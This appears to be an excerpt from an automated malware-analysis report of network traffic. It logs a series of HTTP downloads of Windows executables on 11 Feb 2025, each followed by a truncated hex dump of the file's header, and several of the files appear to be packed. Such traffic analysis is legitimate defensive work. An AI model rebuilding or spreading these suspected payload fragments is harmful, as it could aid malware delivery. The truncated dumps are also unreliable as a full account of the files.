00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 72 68 6e 64 63 6c 66 00 10 00 00 00 60 4a 00 00 06 00 00 00 80 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 4a 00 00 22 00 00 00 86 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 08:21:09 GMTContent-Type: application/octet-streamContent-Length: 2074624Last-Modified: Sun, 09 Feb 2025 11:32:34 GMTConnection: keep-aliveETag: "67a89252-1fa800"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 12 25 9e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 66 04 00 00 ac 00 00 00 00 00 00 00 70 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 4a 00 00 04 00 00 da d7 1f 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 90 05 00 6b 00 00 00 00 80 05 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 05 00 00 10 00 00 00 70 05 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 80 05 00 00 02 00 00 00 80 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 05 00 00 02 00 00 00 82 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2a 00 00 a0 05 00 00 02 00 00 00 84 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 75 66 6d 62 74 6c 78 00 00 1a 00 00 60 30 00 00 fa 19 00 00 86 05 00 00 00 
00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 72 68 6e 64 63 6c 66 00 10 00 00 00 60 4a 00 00 06 00 00 00 80 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 4a 00 00 22 00 00 00 86 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 08:21:20 GMTContent-Type: application/octet-streamContent-Length: 886272Last-Modified: Mon, 10 Feb 2025 19:17:55 GMTConnection: keep-aliveETag: "67aa50e3-d8600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 f5 d0 36 46 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 2b 00 60 05 00 00 82 0d 00 00 04 00 00 c0 13 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 10 0e 00 00 04 00 00 f1 40 0d 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 50 0d 00 b8 14 00 00 00 90 0d 00 b0 65 00 00 00 c0 0c 00 10 20 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 e0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 ab 0c 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 54 0d 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 88 5e 05 00 00 10 00 00 00 60 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 64 61 74 61 00 00 00 50 01 00 00 00 70 05 00 00 02 00 00 00 64 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 20 30 07 00 00 80 05 00 00 32 07 00 00 66 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 70 64 61 74 61 00 00 10 20 00 00 00 c0 0c 00 00 22 00 00 00 98 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 78 64 
61 74 61 00 00 a0 44 00 00 00 f0 0c 00 00 46 00 00 00 ba 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 73 73 00 00 00 00 80 02 00 00 00 40 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 69 64 61 74 61 00 00 b8 14 00 00 00 50 0d 00 00 16 00 00 00 00 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 68 00 00 00 00 70 0d 00 00 02 00 00 00 16 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 80 0d 00 00 02 00 00 00 18 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 65 00 00 00 90 0d 00 00 66 00 00 00 1a 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 05 00 00 00 00 0e 00 00 06 00 00 00 80 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 08:21:26 GMTContent-Type: application/octet-streamContent-Length: 7733760Last-Modified: Mon, 10 Feb 2025 22:21:00 GMTConnection: keep-aliveETag: "67aa7bcc-760200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 18 74 42 63 79 1a 11 63 79 1a 11 63 79 1a 11 28 01 1b 10 64 79 1a 11 63 79 1b 11 6a 79 1a 11 28 fc 1f 10 62 79 1a 11 28 fc e5 11 62 79 1a 11 28 fc 18 10 62 79 1a 11 52 69 63 68 63 79 1a 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 b1 79 aa 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 29 00 da 66 00 00 52 14 00 00 00 00 00 e0 80 65 00 00 10 00 00 00 f0 66 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 7b 00 00 04 00 00 e1 02 76 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 20 f7 66 00 50 00 00 00 00 30 6c 00 bc 6b 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 70 00 24 aa 0a 00 c4 f5 66 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 66 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 d9 66 00 00 10 00 00 00 da 66 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7a 08 00 00 00 f0 66 00 00 0a 00 00 00 de 66 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c0 2f 05 00 00 00 67 00 00 02 
00 00 00 e8 66 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 bc 6b 04 00 00 30 6c 00 00 6c 04 00 00 ea 66 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 24 aa 0a 00 00 a0 70 00 00 ac 0a 00 00 56 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 08:21:34 GMTContent-Type: application/octet-streamContent-Length: 2168320Last-Modified: Sat, 08 Feb 2025 13:31:29 GMTConnection: keep-aliveETag: "67a75cb1-211600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1d e9 b6 df 59 88 d8 8c 59 88 d8 8c 59 88 d8 8c 33 94 da 8c 70 88 d8 8c 59 88 d9 8c 5b 88 d8 8c eb 94 c8 8c 5b 88 d8 8c 59 88 d8 8c 56 88 d8 8c e1 8e de 8c 58 88 d8 8c 52 69 63 68 59 88 d8 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 45 5f 8e 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 de 00 00 00 b6 05 00 00 00 00 00 00 c0 4b 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 4b 00 00 04 00 00 21 06 22 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5b f0 06 00 6f 00 00 00 00 e0 06 00 48 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 06 00 00 10 00 00 00 4a 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 48 04 00 00 00 e0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 06 00 00 02 
00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 2a 00 00 00 07 00 00 02 00 00 00 60 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 70 75 68 68 64 76 67 00 90 1a 00 00 20 31 00 00 8c 1a 00 00 62 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 7a 72 74 6a 65 76 65 00 10 00 00 00 b0 4b 00 00 06 00 00 00 ee 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 4b 00 00 22 00 00 00 f4 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 08:21:41 GMTContent-Type: application/octet-streamContent-Length: 53760Last-Modified: Tue, 11 Feb 2025 05:29:23 GMTConnection: keep-aliveETag: "67aae033-d200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 13 e0 aa 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 c6 00 00 00 0a 00 00 00 00 00 00 16 e5 00 00 00 20 00 00 00 00 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c4 e4 00 00 4f 00 00 00 00 00 01 00 1c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 0c 00 00 00 8c e3 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 30 c5 00 00 00 20 00 00 00 c6 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 1c 06 00 00 00 00 01 00 00 08 00 00 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 01 00 00 02 00 00 00 d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 e4 00 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 56 00 00 ec 8c 00 00 03 00 00 00 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 6d 00 00 00 01 00 00 11 00 28 03 00 00 06 00 28 03 00 00 06 00 28 03 00 00 06 00 28 03 00 00 06 00 14 fe 06 02 00 00 06 73 18 00 00 0a 73 19 00 00 0a 0a 28 03 00 00 06 00 06 6f 1a 00 00 0a 00 7e 0b 00 00 04 25 2d 17 26 7e 0a 00 00 04 fe 06 2e 00 00 06 73 18 00 00 0a 25 80 0b 00 00 04 73 19 00 00 0a 80 01 00 00 04 7e 01 00 00 04 6f 1a 00 00 0a 00 2a 00 00 00 1b 30 05 00 18 03 00 00 02 00 00 11 73 2f 00 00 06 0a 00 28 03 00 00 06 00 28 09 00 00 06 0b 06 73 39 00 00 06 7d 0c 00 00 04 06 fe 06 30 00 00 06 73 1b 00 00 0a 28 1c 00 00 0a 26 00 00 28 03 00 00 06 00 28 0b 00 00 06 0c 28 12 00 00 06 2d 07 72 01 00 00 70 2b 05 72 0b 00 00 70 0d 28 14 00 00 06 13 04 28 03 00 00 06 00 28 1d 00 00 0a 28 1e 00 00 0a 6f 1f 00 00 0a 28 20 00 00 0a 13 05 28 1d 00 00 0a 28 13 00 00 06 6f 1f 00 00 0a 28 20 00 00 0a 13 06 28 0c 00 00 06 13 07 28 0d 00 00 06 13 08 28 0e 00 00 06 13 09 1f 16 8d 4a 00 00 01 25 16 72 17 00 00 70 a2 25 17 07 28 28 00
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 08:21:45 GMTContent-Type: application/octet-streamContent-Length: 1428992Last-Modified: Mon, 10 Feb 2025 23:07:48 GMTConnection: keep-aliveETag: "67aa86c4-15ce00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 5e d1 90 32 1a b0 fe 61 1a b0 fe 61 1a b0 fe 61 0e db fd 60 17 b0 fe 61 0e db fb 60 b5 b0 fe 61 0e db fa 60 0c b0 fe 61 48 c5 fb 60 55 b0 fe 61 48 c5 fa 60 08 b0 fe 61 48 c5 fd 60 03 b0 fe 61 0e db ff 60 15 b0 fe 61 1a b0 ff 61 df b0 fe 61 d2 c5 f6 60 18 b0 fe 61 d2 c5 01 61 1b b0 fe 61 d2 c5 fc 60 1b b0 fe 61 52 69 63 68 1a b0 fe 61 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 34 37 2e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 02 19 00 dc 06 00 00 b2 01 00 00 00 00 00 d3 5c 00 00 00 10 00 00 00 f0 06 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 3f 00 00 04 00 00 00 00 00 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 30 00 40 02 00 00 00 d0 08 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 d0 30 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 30 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 06 00 00 10 00 00 00 d2 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 60 
01 00 00 f0 06 00 00 a6 00 00 00 d6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 30 00 00 00 50 08 00 00 04 00 00 00 7c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 10 00 00 00 80 08 00 00 00 00 00 00 80 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 40 00 00 00 90 08 00 00 2c 00 00 00 80 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 10 00 00 00 d0 08 00 00 02 00 00 00 ac 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 f0 27 00 00 e0 08 00 00 ba 02 00 00 ae 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 64 61 74 61 00 00 00 00 70 0e 00 00 d0 30 00 00 66 0e 00 00 68 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 08:21:52 GMTContent-Type: application/octet-streamContent-Length: 1813504Last-Modified: Mon, 10 Feb 2025 16:18:45 GMTConnection: keep-aliveETag: "67aa26e5-1bac00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 a2 a9 0c f0 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 74 01 00 00 08 00 00 00 00 00 00 00 a0 47 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 47 00 00 04 00 00 ac 71 1c 00 03 00 40 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 c0 01 00 69 00 00 00 00 a0 01 00 48 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 c1 01 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 01 00 00 20 00 00 00 a4 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 48 04 00 00 00 a0 01 00 00 04 00 00 00 c4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 c0 01 00 00 02 00 00 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 2a 00 00 e0 01 00 00 02 00 00 00 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 68 73 75 70 6e 70 6d 00 c0 1a 00 00 c0 2c 00 00 ba 
